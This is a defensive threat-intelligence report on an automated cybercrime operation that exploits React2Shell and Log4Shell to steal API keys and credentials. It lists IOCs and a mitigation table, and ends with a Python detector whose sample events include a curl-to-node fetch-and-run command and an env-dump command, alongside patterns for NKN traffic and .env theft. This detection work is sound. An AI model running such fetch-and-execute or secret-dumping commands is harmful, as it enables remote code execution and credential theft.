SOC Incident Toolkit
Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

Tags: OpenClaw, Log4Shell, React2Shell, Chinese Cybercrime

An automated Chinese cybercrime infrastructure blends large-scale exploitation with structured orchestration and direct monetization. Coordinated through a centralized backend and an agent-based workflow system, the operation conducts internet-scale reconnaissance via FOFA and 360Quake, exploits vulnerable web applications using React2Shell, extracts AI API keys, Stripe credentials and database secrets, and immediately validates the stolen data for financial gain. Primary targets are Web3 platforms, fintech services and cloud-native organizations.

Indicators of Compromise

Domains (3)

soft-silence-d978.13544681192.workers.dev
anson-aeromarine-ocularly.ngrok-free.dev
kf.unpkg.top

IPv4 (1)

124.220.164.14

Emails (3)

Notes

Conclusion

The OpenClaw / Paperclip infrastructure represents a maturation point in Chinese cybercrime operations: the transition from opportunistic, manual exploitation to a structured, workflow-driven attack platform with enterprise-grade operational management. The operation's combination of internet-scale reconnaissance, automated exploitation against hundreds of targets simultaneously, fileless C2 over the decentralized NKN network, and immediate credential monetization creates an end-to-end cybercrime pipeline that is both highly scalable and difficult to detect with traditional security tools.

Three aspects of this operation demand specific attention from defenders:

- The monetization layer is immediate. Stolen API keys are not bulk-dumped to dark web markets; they are validated and used or sold within hours. An organization that detects this exploitation pattern days after the fact should assume its Stripe, AI, and cloud credentials are already compromised and actively being monetized.
- The NKN-based fileless C2 is resistant to standard blocking. Domain and IP blocklists are ineffective against an agent that communicates via a decentralized blockchain P2P network and is delivered entirely in memory. Detection requires behavioral monitoring of process trees and of network connections to nkn.org, not signature matching.
- Scale is the primary defense challenge. At ~45,000 exploitation attempts and 5,374 active backdoors, this operation is running at a volume that makes targeted response impractical. The actor is not hunting specific organizations; they are systematically compromising every publicly exposed vulnerable React and Java application they can find via FOFA. The correct defensive posture is eliminating the vulnerability, not monitoring for targeting.

Any organization operating in Web3, fintech, or cloud-native environments with publicly exposed React or Java applications should treat this threat as active and verified. The combination of FOFA visibility data and automated React2Shell/Log4Shell exploitation means unpatched applications will be found, exploited, and harvested on automated schedules. Patching the applications and migrating secrets out of .env files are the only reliable mitigations.

Mitigation

Priority   Action

CRITICAL   Patch CVE-2025-55182 & CVE-2025-66478 (React2Shell) -- apply vendor advisory update across all React applications
CRITICAL   Patch CVE-2021-44228 (Log4Shell) -- upgrade Log4j to 2.17.1+; disable JNDI lookups if patching is not immediately possible
CRITICAL   Block at perimeter: 124[.]220[.]164[.]14 (all ports), *.nkn.org:30003, soft-silence-*.workers.dev, d6[.]tfdl[.]net, deltajohnsons[.]com
CRITICAL   Close .env web access -- deny /.env and /api/.env paths in web server config; move secrets to a secrets manager (Vault, AWS SM, Azure KV)
CRITICAL   Rotate all exposed credentials: AI API keys (OpenAI, Anthropic, Gemini, DeepSeek), Stripe live keys, GitHub tokens, DB credentials
HIGH       Update WAF rules: add React2Shell and Log4Shell JNDI blocking signatures; rate-limit IPs >100 req/min
HIGH       Deploy Sigma rules to SIEM: env variable dump from web process (CRITICAL), fileless curl|node pipe (HIGH), NKN outbound (HIGH)
HIGH       Deploy YARA rules 7.1-7.4 to EDR/AV: React2Shell scripts, NKN agent, credential harvesting patterns, CF tunnel + P2P persistence
HIGH       Audit FOFA / Shodan exposure: scan own ASN for publicly visible React and Java applications; restrict or take offline unnecessary ones
MEDIUM     Configure API usage alerts: set spend limits and anomaly alerts for all AI API keys; monitor OpenAI, Anthropic, and Stripe dashboards
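As an added example (not code from the toolkit or the report's authors), the script below encodes the three Sigma behaviours listed in the table (env dump from a web process, fileless curl|node pipe, NKN outbound) plus the .env path check as plain Python rules, and runs them over constructed sample telemetry. The event schema (type, parent, cmdline, dst_host, dst_port, path, status) is an assumed normalised form, not any particular SIEM's field names.

```python
import re

# Process names that serve web traffic; a shell child of one of these dumping
# the environment is the report's "env variable dump from web process" case.
WEB_PROCESSES = {"node", "java", "php-fpm", "nginx", "apache2", "httpd", "gunicorn"}

ENV_DUMP_RE = re.compile(r"\b(env|printenv)\b|\bcat\b[^|;]*\.env\b")
# "curl ... | node" style fetch-and-execute with nothing written to disk.
FILELESS_PIPE_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(node|sh|bash|python3?)\b")
# Requests for /.env, /api/.env, /.env.backup and similar.
ENV_PATH_RE = re.compile(r"(^|/)\.env(\.[A-Za-z0-9_-]+)?$")
NKN_PORT = 30003  # NKN node port named in the mitigation table

# Constructed sample telemetry (not from the report): process creations,
# outbound connections and web access-log entries in an assumed dict schema.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "node", "cmdline": "sh -c env"},
    {"type": "process", "parent": "java",
     "cmdline": "sh -c 'curl -s http://example.invalid/x.js | node'"},
    {"type": "process", "parent": "bash", "cmdline": "ls -la"},
    {"type": "network", "process": "node", "dst_host": "seed.nkn.org", "dst_port": 30003},
    {"type": "network", "process": "node", "dst_host": "api.example.invalid", "dst_port": 443},
    {"type": "http", "src_ip": "203.0.113.5", "path": "/api/.env", "status": 200},
    {"type": "http", "src_ip": "203.0.113.5", "path": "/index.html", "status": 200},
]

def check_process(ev):
    cmd, parent = ev.get("cmdline", ""), ev.get("parent", "")
    if parent in WEB_PROCESSES and ENV_DUMP_RE.search(cmd):
        return ("CRITICAL", "env_dump_from_web_process", f"{parent} -> {cmd}")
    if FILELESS_PIPE_RE.search(cmd):
        return ("HIGH", "fileless_curl_pipe", f"{parent} -> {cmd}")
    return None

def check_network(ev):
    host, port = ev.get("dst_host", "").lower(), ev.get("dst_port")
    if host == "nkn.org" or host.endswith(".nkn.org") or port == NKN_PORT:
        return ("HIGH", "nkn_outbound", f"{ev.get('process')} -> {host}:{port}")
    return None

def check_http(ev):
    path, status = ev.get("path", ""), ev.get("status")
    if ENV_PATH_RE.search(path):
        # A 200 means the secrets file was actually served, not merely probed.
        sev = "CRITICAL" if status == 200 else "MEDIUM"
        return (sev, "env_file_request", f"{ev.get('src_ip')} {path} {status}")
    return None

HANDLERS = {"process": check_process, "network": check_network, "http": check_http}

def detect(events):
    # Route each event to the handler for its type and collect the hits.
    findings = []
    for ev in events:
        handler = HANDLERS.get(ev.get("type"))
        hit = handler(ev) if handler else None
        if hit:
            findings.append(hit)
    return findings
```

The env-token check is deliberately broad (a web process launching `node app.js --env prod` would also match), so tune WEB_PROCESSES and ENV_DUMP_RE to the fleet before alerting at CRITICAL.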